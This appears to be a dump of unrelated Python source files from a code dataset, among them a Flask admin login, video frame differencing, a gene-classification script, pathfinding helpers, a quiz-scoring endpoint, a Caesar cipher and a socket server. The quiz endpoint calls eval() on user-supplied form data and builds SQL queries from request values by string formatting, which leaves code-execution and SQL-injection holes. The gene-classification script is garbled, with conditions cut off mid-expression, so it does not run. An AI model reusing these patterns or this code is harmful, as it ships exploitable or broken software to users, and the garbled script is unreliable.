debug_toolbar,\n api,\n admin,\n)\nfrom nektime import public\n\n\n\ndef create_app(config_object=ProdConfig):\n '''An application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n '''\n app = Flask(__name__)\n app.config.from_object(config_object)\n register_extensions(app)\n register_blueprints(app)\n # register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n assets.init_app(app)\n bcrypt.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n debug_toolbar.init_app(app)\n migrate.init_app(app, db)\n api.init_app(app)\n admin.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(public.api.mod)\n return None\n\n\n\n######################################\nfrom wtforms import form, fields, validators\nimport flask_login as login\n\nclass LoginForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n user = self.get_user()\n\n if user is None:\n raise validators.ValidationError('Invalid user')\n\n # we're comparing the plaintext pw with the hash from the db\n if not check_password_hash(user.password, self.password.data):\n # to compare plain text passwords use\n # if user.password != self.password.data:\n raise validators.ValidationError('Invalid password')\n\n def get_user(self):\n return db.session.query(User).filter_by(login=self.login.data).first()\n\nclass RegistrationForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n email = fields.TextField()\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n if db.session.query(User).filter_by(login=self.login.data).count() > 0:\n raise validators.ValidationError('Duplicate username')\n\n@login_manager.user_loader\ndef load_user(user_id):\n return db.session.query(User).get(user_id)\n\n#########################################\nfrom flask import redirect, url_for, request\nfrom flask_admin import BaseView, expose, helpers\nfrom flask_admin.contrib.sqla import ModelView\nfrom nektime.models import User, Answer, Question\n\nclass MyIndexView(BaseView):\n @expose('/')\n def index(self):\n if not login.current_user.is_authenticated():\n return redirect(url_for('.login_view'))\n return super(MyIndexView, self).index()\n @expose('/login/', methods=('GET','POST'))\n def login_view(self):\n form = LoginForm(request.form)\n if helpers.validate_form_on_submit(form):\n user = form.get_user()\n login.login_user(user)\n if login.current_user.is_authenticated():\n return redirect(url_for('.index'))\n link = '<p>Don\'t have an account? <a href=\"' + url_for('.register_view') + '\">Click here to register.</a></p>
'\n self._template_args['form'] = form\n self._template_args['link'] = link\n return super(MyIndexView, self).index()\n @expose('/logout/')\n def logout_view(self):\n login.logout_user()\n return redirect(url_for('.index'))\n\nclass MyModelView(ModelView):\n def is_accessible(self):\n return login.current_user.is_authenticated()\n\nadmin.add_view(MyIndexView(name='Hello 1', endpoint='test1', category='Test'))\nadmin.add_view(MyIndexView(name='Hello 2', endpoint='test2', category='Test'))\nadmin.add_view(MyIndexView(name='Hello 3', endpoint='test3', category='Test'))\n\nadmin.add_view(MyModelView(User, db.session))\nadmin.add_view(MyModelView(Question, db.session))\nadmin.add_view(MyModelView(Answer, db.session))","sub_path":"nektime/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"568927307","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom capture import *\nimport numpy\n\n# Note: we consider frame differences to be the number of pixels with an rgb\n# component > 5 components (out of 255) different from the previous frame.\n# this probably doesn't catch all cases, but works well in the common case\n# of eliminating frame differences due to \"noise\" in the HDMI capture\nPIXEL_DIFF_THRESHOLD = 5.0\n\ndef get_framediff_image(capture, framenum1, framenum2, cropped=False):\n frame1 = capture.get_frame(framenum1, cropped)\n frame2 = capture.get_frame(framenum2, cropped)\n framediff = numpy.abs(frame1.astype('float') - frame2.astype('float'))\n for row in framediff:\n for px in row:\n if px[0] >= PIXEL_DIFF_THRESHOLD or px[1] >= PIXEL_DIFF_THRESHOLD \\\n or px[2] >= PIXEL_DIFF_THRESHOLD:\n px[0] = 255.0\n px[1] = 0.0\n px[2] = 0.0\n\n return Image.fromarray(framediff.astype(numpy.uint8))\n\ndef get_framediff_sums(capture):\n try:\n cache = pickle.load(open(capture.cache_filename, 'r'))\n except:\n cache = {}\n\n try:\n diffsums = cache['diffsums']\n except:\n # Frame differences\n diffsums = None\n prevframe = None\n diffsums = []\n for i in range(1, capture.num_frames+1):\n frame = capture.get_frame(i, True).astype('float')\n if prevframe is not None:\n framediff = (frame - prevframe)\n framediff = framediff[framediff >= PIXEL_DIFF_THRESHOLD]\n diffsums.append(len(framediff))\n prevframe = frame\n cache['diffsums'] = diffsums\n pickle.dump(cache, open(capture.cache_filename, 'w'))\n\n return diffsums\n\ndef get_num_unique_frames(capture):\n framediff_sums = get_framediff_sums(capture)\n return 1 + len([framediff for framediff in framediff_sums if framediff > 0])\n\ndef get_fps(capture):\n return get_num_unique_frames(capture) / capture.length\n\ndef 
get_stable_frame(capture, threshold = 2048):\n framediff_sums = get_framediff_sums(capture)\n for i in range(len(framediff_sums)-1, 0, -1):\n if framediff_sums[i] > threshold:\n return i+1\n return len(framediff_sums)-1\n","sub_path":"src/videocapture/videocapture/framediff.py","file_name":"framediff.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"237887145","text":"#!/usr/bin/env python\nimport sys,re\n\nIN=open(sys.argv[1],'r')\n\nOUT=open(sys.argv[2],'w')\n\nOUT1=open(\"Pg.Classfication.xls\",'w')\n\n#type distance lncRChr lncRstart lncRend Chr start end\n#genedist 193 Chr1 780106 780409 Chr1 780602 781285\n#genedist 815 Chr1 2816 2497 At1NC000020 Chr1 3631 5899 AT1G01010\n\np=0\nb=0\nc=0\nf=0 #(head to head)\ne=0\nd=0\nfr=IN.readline()\n\ndistant=0\n\nOUT1.write(\"\\t\".join([\"Classification\",\"Type\",\"distance\",\"lncRChr\",\"lncRstart\",\"lncRend\",\"lnRNA\",\"Chromosome\",\"Start\",\"End\",\"Gene/Pseudogene\"])+\"\\n\")\nfor eachline in IN:\n\tsplit=eachline.rstrip().split(\"\\t\")\n\tla=int(split[3])\t\n\tlb=int(split[4])\n\tga=int(split[7])\n\tgb=int(split[8])\n\tif int(split[1])<2000 and split[0]==\"pgdist\":\n\t\tif (lbga):\n\t\t\tif ga>lb:\n\t\t\t\tp+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Promoter associated\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif lb>gb:\n\t\t\t\tf+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Tail to Tail\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif lbgb):\n\t\t\tif gagb:\n\t\t\t\tb+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Body associated\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif gb>lb:\n\t\t\t\tf+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Tail to Tail\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\telif (la=2000 and split[0]==\"pgdist\":\n\t\tdistant+=1\nOUT.write(\"%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n\"%(\"promoter\",p,\"body\",b,\"Co\",c,\"f\",f,\"distant\",distant))\n\nIN.close()\nOUT.close()\t\n","sub_path":"script/Sumpgv1.py","file_name":"Sumpgv1.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266953353","text":"import board_manipulation as b_m\nfrom search_node import search_node\n\n# manhattan distance is distance between two points on a grid based on strictly horizontal and/or vertical path\ndef manhattan_distance(start, end):\n\n sx, sy = start\n ex, ey = end\n\n return abs(ex - sx) + abs(ey - sy)\n\n# generates and returns all children nodes of the node if it does not collide with a wall\ndef generate_all_successors(board, node):\n\n new_nodes = {}\n cell_categories = [\"w\", \"m\", \"f\", \"g\", \"r\", \".\", \"B\"]\n\n temp_location = list(node.location)\n\n if temp_location[1] < (len(board)-1): # checks if this is edge of map\n\n temp_location[1] += 1 # y value +1 (goes up)\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories: #checks if map value is not a wall\n\n #creates a node\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g , Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n #creates the nodes \"state\", what path it takes from start node\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n #repeats previous actions on left, right, down movement\n\n temp_location = 
list(node.location)\n\n if temp_location[0] < (len(board[0])-1):\n\n temp_location[0] += 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0],temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n temp_location = list(node.location)\n\n if temp_location[1]> 0:\n\n temp_location[1] -= 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n temp_location = list(node.location)\n\n if temp_location[0] > 0:\n\n temp_location[0] -= 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n return new_nodes\n\n# attaches child to a node that is now considered its best parent so far\ndef attach_and_eval(map_array, child, parent, goal_location):\n\n child.parent = parent\n child.g = parent.g + b_m.calculate_g(map_array, child)\n child.h = manhattan_distance(child.location, goal_location)\n child.f = int(child.g) # doesnt matter what f is in bfs\n\n# recurses through the children of a parent and other descendants if the new parent.g value makes the path better\ndef propagate_path_improvements(map_array, parent):\n\n for kid in parent.children:\n\n if ((parent.g) + b_m.calculate_g(map_array, kid)) < kid.g:\n\n kid.parent = parent\n kid.g = parent.g + b_m.calculate_g(map_array, kid)\n kid.f = kid.g # doesnt matter what f is in bfs","sub_path":"bfs/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260646019","text":"# Create your views here.\n\nfrom blog.models import Blog, Category\nfrom django.shortcuts import render_to_response, get_object_or_404\n\ndef index(request):\n \"\"\"render index.html\n \n Arguments:\n - `request`:\n \"\"\"\n context = {'categories': Category.objects.all(),\n 'posts':Blog.objects.all()[:5]}\n return render_to_response('index.html',\n context,)\n\n\ndef view_post(request, slug):\n \"\"\"render posts\n \n Arguments:\n - `request`:\n - `slug`:\n \"\"\"\n context = {'post':get_object_or_404(Blog, slug=slug)}\n render_to_response('view_post.html',\n context)\n\ndef view_category(request, slug):\n \"\"\"view categories\n \n Arguments:\n - `request`:\n - `slug`:\n \"\"\"\n category = get_object_or_404(Category, slug=slug)\n context = {'category':category,\n 'posts':Blog.objects.filter(category=category)[:5]}\n \n render_to_response('view_category.html', \n context)\n\n \n\n\n\n 
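One note on the `bfs/functions.py` record above: the docstring of `propagate_path_improvements` promises to recurse through children *and other descendants*, but the body only visits direct children. A recursive variant consistent with that docstring would look like this (a sketch, not the original code):

```python
# Sketch: propagate improved g-values through all descendants, not just
# the direct children (mirrors the textbook A*/best-first helper).
import board_manipulation as b_m  # same helper module that record imports

def propagate_path_improvements_rec(map_array, parent):
    for kid in parent.children:
        new_g = parent.g + b_m.calculate_g(map_array, kid)
        if new_g < kid.g:
            kid.parent = parent
            kid.g = new_g
            kid.f = kid.g  # f == g in this BFS variant
            propagate_path_improvements_rec(map_array, kid)  # recurse deeper
```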
\n","sub_path":"djangorocks/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459576174","text":"from flask import Flask, request, Response\nfrom pymysql import cursors\nimport json\n\ndef javaHashMapStrToJson(data):\n data = data.replace(',', '}, {')\n data = data.replace('=',',')\n data = data.replace(\"'\",'\"')\n data = '['+data+']'\n data = eval(data)\n data = sorted(data,key = lambda i:i['id'])\n return data\n\ndef mod(n):\n if n < 0:\n return -n\n return n\n\ndef answers(connection):\n with connection.cursor() as cursor:\n fbid = request.form.get(\"firebase_id\")\n cursor.execute(\"SELECT firebase_id FROM profile WHERE firebase_id = '{}'\".format(fbid))\n if cursor.rowcount == 0:\n return Response(json.dumps({\"status\": \"failure\", \"Reason\":\"Firebase ID doesnot exist\", \"status_code\": \"200\"}), mimetype=\"application/json\", status=200)\n data = request.form.get(\"answers\")\n try:\n data = javaHashMapStrToJson(data)\n except:\n return Response(json.dumps({\"status\":\"failure\", \"Reason\":\"Cant parse answers\", \"status_code\":\"200\"}),mimetype=\"application/json\",status = 200)\n score = 0\n id = 0\n query = \"select * from quiz where id = \".format(data[id][\"id\"])\n for i in range(len(data)):\n query += \" {} or id = \".format(data[id][\"id\"])\n id+=1\n id = 0\n query = query[:-9]\n cursor.execute(query)\n if cursor.rowcount==0:\n return Response(json.dumps({\"status\": \"failure\", \"status_code\": \"200\"}), mimetype=\"application/json\", status=200)\n ans = cursor.fetchall()\n for i in range(len(data)):\n qid = ans[id][\"id\"]\n if(int(ans[id][\"ans\"])==int(data[id][\"ans\"])):\n score+=1\n id+=1\n cursor.execute(\"SELECT quiz_rating FROM profile WHERE firebase_id = '{}'\".format(fbid))\n rating = cursor.fetchone()\n rating = rating[\"quiz_rating\"]\n newRating = rating+score\n cursor.execute(\"UPDATE profile SET quiz_rating = '{}', points = points + {} WHERE firebase_id = '{}'\".format(newRating,score,fbid))\n # connection.commit()\n return Response(json.dumps({\"status\": \"success\", \"status_code\": \"200\", \"score\": score}),mimetype = \"application/json\",status = 200)\n","sub_path":"quiz_answers.py","file_name":"quiz_answers.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"34488279","text":"from random import *\n\n\n# ETAPE 1\ndef crypter_char(char, decalage):\n actuel = ord(char)\n actuel += decalage\n return chr(actuel)\n\n\n# ETAPE 2\ndef decrypter_char(char, decalage):\n actuel = ord(char)\n actuel -= decalage\n return chr(actuel)\n\n\n# ETAPE 3\ndef crypter_phrase(phrase, decalage):\n nouvelle_phrase = \"\"\n for lettre in phrase:\n nouvelle_phrase += crypter_char(lettre, decalage)\n return nouvelle_phrase\n\n\n# ETAPE 4\ndef decrypter_phrase(phrase, decalage):\n nouvelle_phrase = \"\"\n for lettre in phrase:\n nouvelle_phrase += decrypter_char(lettre, decalage)\n return nouvelle_phrase\n\n\n# ETAPE 5\ndef cryptage(element):\n decalage = randrange(1, 10)\n phrase = crypter_phrase(element, decalage)\n return chr(decalage) + phrase\n\n\n# ETAPE 6\ndef decryptage(element):\n decalage = ord(element[0])\n phrase = element[1:]\n return decrypter_phrase(phrase, decalage)\n\n\n# ETAPE 7\ndef main():\n reponse = str(input('Voulez-vous crypter ou decrypter: '))\n while (reponse.lower() != 'crypter' and reponse.lower() != 
'decrypter'):\n reponse = str(input('Voulez-vous crypter ou decrypter: '))\n\n if (reponse.lower() == 'crypter'):\n element = str(input('Element à crypter: '))\n print('Element crypter: ', cryptage(element))\n else:\n element = str(input('Element à decrypter: '))\n print('Element décrypter: ', decryptage(element))\n\n\n# ETAPE 8\nreponse = \"rien\" # pour rentrer dans le while\nwhile (reponse.lower() != 'non'):\n main()\n reponse = str(input('\\nVoulez-vous recommencer? ')) \n","sub_path":"exo9.6.py","file_name":"exo9.6.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414210145","text":"import os, time, json, logging\n\nfrom initial_ML_module import Trainer\n\ntrain_folder = os.environ.get(\"TRAIN_DATA_FOLDER\",\"./train\")\nlog_folder = os.environ.get(\"LOGS_FOLDER\",\"./logs\")\n\nlogFile = log_folder + '/ml.log'\nlogger = logging.getLogger(__name__)\n\n# Create handlers\nf_handler = logging.FileHandler(logFile)\nf_handler.setLevel(logging.DEBUG)\n\n# Create formatters and add it to handler\nf_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nf_handler.setFormatter(f_format)\n\n# Add handlers to the logger\nlogger.addHandler(f_handler)\ndef start():\n logger.info(\"Training process started ...\")\n _json = None \n try:\n _file = open(train_folder + \"/train.data\",'r')\n _json = json.loads(_file.read())\n _file.close()\n except Exception as e:\n logger.info(\"An error occured\")\n logger.info(e)\n return False \n try:\n trainer = Trainer(_json[\"url_file\"],_json[\"target\"],_json[\"application\"],_json[\"features\"], _json['variant'])\n trainer.train()\n except Exception as e:\n print(e)\n logger.info(e)\n\nif __name__ == \"__main__\":\n start()","sub_path":"forecasting/morphemic/morphemic-performance-model/ml_code/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"388483145","text":"import math\nN = int(input())\n\ninput_list = [list(map(int, input().split())) for i in range(N)]\n \ndistance_list = []\nfor x1, y1 in input_list:\n for x2, y2 in input_list:\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n distance_list.append(dist)\nprint(round(max(distance_list), 6))","sub_path":"arc004/a/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"84697487","text":"from datetime import date\n\nfrom bidict import bidict\n\nfrom constants import DB\nfrom models import Vehicle, Company, DeliveryNote, DeliveryNoteItem\nfrom models import Settings\n\nITEM_TYPES = bidict(\n {\"HOURS\": \"Hours\",\n \"KMS\": \"Kms\",\n \"OTHERS\": \"Others\"}\n )\nEXPIRATION_DAYS = (30, 60, 90, 120, 180)\nPAYMENT_TYPES = bidict(\n {\"CONFIRMING\": \"Confirming\",\n \"BANK_TRANSFER\": \"Bank transfer\",\n \"PROMISSORY_NOTE\": \"Promissory note\",\n \"CASH\": \"Cash\", \"PAID\": \"Paid\",\n \"CHECK\": \"Check\"}\n )\n \n\ndef init_db():\n DB.connect()\n DB.drop_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n DB.create_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n\n\ndef drop_tables():\n DB.connect()\n DB.drop_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n\n\ndef populate_db():\n v12 = Vehicle(\n number=12, plate=\"1234ABC\", 
brand=\"My brand\",\n model=\"My model\", hour_price=27.32, km_price=8.99\n )\n v15 = Vehicle(\n number=15, plate=\"9876ZYX\", brand=\"My brand\",\n model=\"My model\", hour_price=34.02, km_price=4.00\n )\n v12.save()\n v15.save()\n\n c1 = Company(\n code=\"0001\", name=\"Company name\", nif=\"B12345678\",\n address=\"Rue st.\", city=\"Zaragoza\", state=\"Zaragoza\",\n zip_code=\"50000\", phone=\"123456789\", contact_person=\"Foolano\",\n alternative_phone=\"987654321\", fax=\"246813579\",\n email=\"foolano@bar.com\", iban=\"ES12345678901234567890123456789012\",\n bank_name=\"THE Bank\", payment_type=\"CASH\", expiration_days=30,\n first_payment_day=5, second_payment_day=15, third_payment_day=25\n )\n\n c2 = Company(\n code=\"0002\", name=\"Foo Inc.\", nif=\"B45678123\",\n address=\"Major st\", city=\"Zaragoza\", state=\"Zaragoza\",\n zip_code=\"50002\", email=\"foolano@bar.com\",\n iban=\"ES12345678901234567890123456789012\", bank_name=\"Minor Bank\",\n payment_type=\"BANK_TRANSFER\", expiration_days=45,\n first_payment_day=8\n )\n\n c1.save()\n c2.save()\n\n dn1 = DeliveryNote(\n code=\"11111111\", date=date(2016, 1, 3), company=c1, vehicle=v12,\n invoiced=False\n )\n dn2 = DeliveryNote(\n code=\"22222222\", date=date(2016, 1, 5), company=c1, vehicle=v15,\n invoiced=False\n )\n dn1.save()\n dn2.save()\n\n dni1 = DeliveryNoteItem(\n delivery_note=dn1, item_type=\"HOURS\", units=12,\n price=v12.hour_price, description=\"Working hard\"\n )\n dni2 = DeliveryNoteItem(\n delivery_note=dn2, item_type=\"HOURS\", units=7,\n price=21.00, description=\"We are working hard here\"\n )\n dni3 = DeliveryNoteItem(\n delivery_note=dn2, item_type=\"OTHERS\", units=1,\n price=327.86, description=\"Are you working hard?\"\n )\n dni1.save()\n dni2.save()\n dni3.save()\n\n Settings(vat=21.00, invoice_number=\"0000000001\").save()\n","sub_path":"sigg/util/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"313206570","text":"import socket#Get Required Modules\nimport sys\nfrom _thread import *\naddress=[]\nconnections=[]\n\ndef ReturnData(Type):\n if Type==\"Connections\":\n global address\n return address\n\ndef Message(Message,ConnN):\n #Message(Message , Connection Number)\n #Send Client(s) a message\n global connections#Get Connections List from Global Source\n if ConnN==\"*\":\n for connection in connections:#For Every Connection\n connection.sendall(Message)#Send Message To Current Connection\n else:\n connections[ConnN].sendall(Message)#Send Message To Selected Connection\n\ndef GetReply(Query,ConnN,Terminator):\n #GetReply(Question , Connection Num , End Character , Reply Message)\n #Ask Client(s) a question\n global connections#Get Connections List from Global Source\n if ConnN==\"*\":#If Target Connection is \"*\"\n for ConTrgt in connections:#Run GetReplyExec for each Connection\n Word=[]\n Word.append(GetReplyExec(Query,ConTrgt,Terminator))\n else:#Run GetReplyExec for Selected Connection\n print(connections)\n Word=GetReplyExec(Query,connections[ConnN],Terminator)\n print(Word)\n return Word\n exit()\n\ndef GetReplyExec(Query,ConTrgt,Terminator):\n #GetReply(Question , Connection Num , End Character , Reply Message)\n #Ask Client(s) a question\n ConTrgt.sendall(str.encode(Query))#Send Client Message\n Word=GetUsrInput(ConTrgt,Terminator)\n return Word\n\ndef GetUsrInput(ConTrgt,Terminator):\n Word=\"\"\n while True:\n c = ConTrgt.recv(2048000).decode(\"utf-8\")#Get 
Clients Character Input\n        Word+=c # Add character to the word/sentence\n\n        if c==\"\b\": # if character is (Back Space)\n\n            Word=Word[0:len(Word)-2] # Remove delete character and previous character\n\n        if Terminator not in Word: # Check if terminator character is in Word\n\n            if not Word:\n                break # End function\n\n        if Terminator in Word: # If terminator is in Word\n\n            #print(Word[0:len(Word)-1]) # Display Word\n            return Word[0:len(Word)-1]\n\ndef Server():\n    #start_new_thread(Server,())\n    #Start The Server\n\n    import socket # Import required modules\n    import sys\n\n    host = '' # Set connection settings\n    port = 1234\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    try: # Try to bind to port and IP\n        s.bind((host, port))\n    except socket.error as e:\n        print(str(e))\n\n    s.listen(5)\n    #print('Waiting for a connection.')\n\n    global connections, address # declare globals before assignment; a 'global' after assigning is a SyntaxError\n    connections=[] # Create connections list\n    address=[]\n\n    while True:\n\n        connection, addr = s.accept() # Set connection and addr\n        connections.append(connection) # Add connection to list of connections\n        address.append(addr)\n        print('connected to: '+addr[0]+':'+str(addr[1])) # Log the new connection\n\n#start_new_thread(Server,())\n","sub_path":"Server/Version 1/ServerModule.py","file_name":"ServerModule.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"475076779","text":"#\n# [347] Top K Frequent Elements\n#\n# https://leetcode.com/problems/top-k-frequent-elements/description/\n#\n# algorithms\n# Medium (50.13%)\n# Total Accepted: 113.4K\n# Total Submissions: 226.1K\n# Testcase Example: '[1,1,1,2,2,3]\\n2'\n#\n#\n# Given a non-empty array of integers, return the k most frequent elements.\n#\n# For example,\n# Given [1,1,1,2,2,3] and k = 2, return [1,2].\n#\n#\n# Note:\n#\n# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.\n# Your algorithm's time complexity must be better than O(n log n), where n is\n# the array's size.\n#\n\n\nclass Solution:\n    def topKFrequent(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: List[int]\n        \"\"\"\n        dic = dict()\n        for n in nums:\n            if n not in dic:\n                dic[n] = 1\n            else:\n                dic[n] += 1\n\n        # Bucket Sort using frequency number in dic\n        bucket = [set() for x in range(len(nums)+1)]\n        for n in nums:\n            bucket[dic[n]].add(n)\n        res, i = [], 0\n        for b in bucket[::-1]:\n            for n in b:\n                res.append(n)\n                i += 1\n                if i == k:\n                    return res\n","sub_path":"347.top-k-frequent-elements.python3.py","file_name":"347.top-k-frequent-elements.python3.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"318200876","text":"#!/usr/bin/env python3\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import Int32MultiArray\nimport rrtstarconnect1\nimport numpy as np\n\ndef print1():\n    print(\"hello from ros\")\n\ndef give():\n    pub = rospy.Publisher('path_topic', Int32MultiArray, queue_size=10)\n    rospy.init_node('path_node', anonymous=True)\n    rate = rospy.Rate(10) # 10hz\n    path = Int32MultiArray()\n    # path.data = rrtstarconnect1.p4\n\n    while not rospy.is_shutdown():\n        # path = rrtstarconnect1.p4\n        # img = rrtstarconnect1.imre\n        # rrtstarconnect1.show(img)\n        p5 = np.array(rrtstarconnect1.p4)\n        print(p5)\n        # p5 = (p5/300)*11\n        path.data = np.frombuffer(p5.tobytes(),'int32')\n        print(path.data)\n        pub.publish(path)\n        rate.sleep()\n\nif __name__ == '__main__':\n    try:\n
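        # run the planner first so give() can publish the path stored in rrtstarconnect1.p4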
rrtstarconnect1.rrtstarconnect()\n give()\n except rospy.ROSInterruptException:\n pass","sub_path":"task 3/codes/catkin_ws/src/turtle/src/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266007195","text":"# Calcule o resultado da expressão A > b and C or D, utilizando os valores da tabela a seguir.\n\na = 1\nb = 2\nc = True\nD = False\n\nprint (a > b and c or D) # falso\n\na2 = 10\nb2 = 3\nc2 = False\nd2 = False\n\nprint (a2 > b2 and c2 or d2)\n\na3 = 5\nb3 = 1\nc3 = True\nd3 = True\n\nprint (a3 > b3 and c3 or d3)\n\n","sub_path":"exercicio 3.5.py","file_name":"exercicio 3.5.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"232332239","text":"#! /usr/bin/env python \n\nimport urllib2\nimport subprocess\nimport stat\nimport os\nimport time\nimport smtplib\nimport shlex\nimport socket\nimport fcntl\nimport sys\n\nSCRIPTS_PATH = '/root/scripts/'\nTOMCAT_URL = 'http://www.intranet.upsa.es:8180/prueba'\nWEB_URL = 'http://www.upsa.es/prueba'\nTOMCAT_PID_FILE = '/var/run/tomcat5.5.pid'\nWEB_PID_FILE = '/var/run/lighttpd.pid'\nLOCK_FILE = '/var/lock/check_services'\n\ndef test_url(url):\n try:\n uf = urllib2.urlopen(url)\n except:\n return False\n data = uf.read().strip()\n if data == 'OK':\n return True\n else:\n return False\n\ndef test_service(pid_file):\n if os.path.exists(pid_file):\n mode = os.stat(pid_file)\n if (mode[stat.ST_CTIME] + 300) > int(time.time()):\n return False\n return True\n\ndef test_web():\n if test_service(WEB_PID_FILE) and not test_url(WEB_URL):\n return False\n return True\n\ndef test_tomcat():\n if test_service(TOMCAT_PID_FILE) and not test_url(TOMCAT_URL):\n return False\n return True\n\n\ndef restart_service(service):\n msg = \"\"\"Subject: reinciando servicios\n\n Reiniando servicios: \n \"\"\" \n msg = msg + service\n server = smtplib.SMTP('edge.upsa.es')\n server.sendmail('webpro01@upsa.es', 'sistemas@upsa.es', msg)\n server.quit()\n cmd = '/etc/init.d/' + service + ' restart'\n args = shlex.split(cmd)\n subprocess.Popen(args)\n\ndef lock():\n f = open(LOCK_FILE, 'w')\n try:\n fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)\n except:\n return False\n return f\n\ndef unlock(f):\n fcntl.flock(f.fileno(), fcntl.LOCK_UN)\n f.close()\n os.remove(LOCK_FILE)\n return True\n\ndef main():\n\n f = lock()\n if not f:\n sys.exit()\n \n timeout = 5\n socket.setdefaulttimeout(timeout)\n \n if not test_tomcat() or not test_tomcat():\n restart_service('tomcat5.5')\n if not test_web() or not test_web():\n restart_service('lighttpd')\n \n unlock(f)\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_services.py","file_name":"check_services.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"36974809","text":"import inspect\n\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Iterable\n\nimport typing\nfrom typing import Dict, Any, NoReturn\n\nimport discord\nfrom discord.ext.commands import Bot, 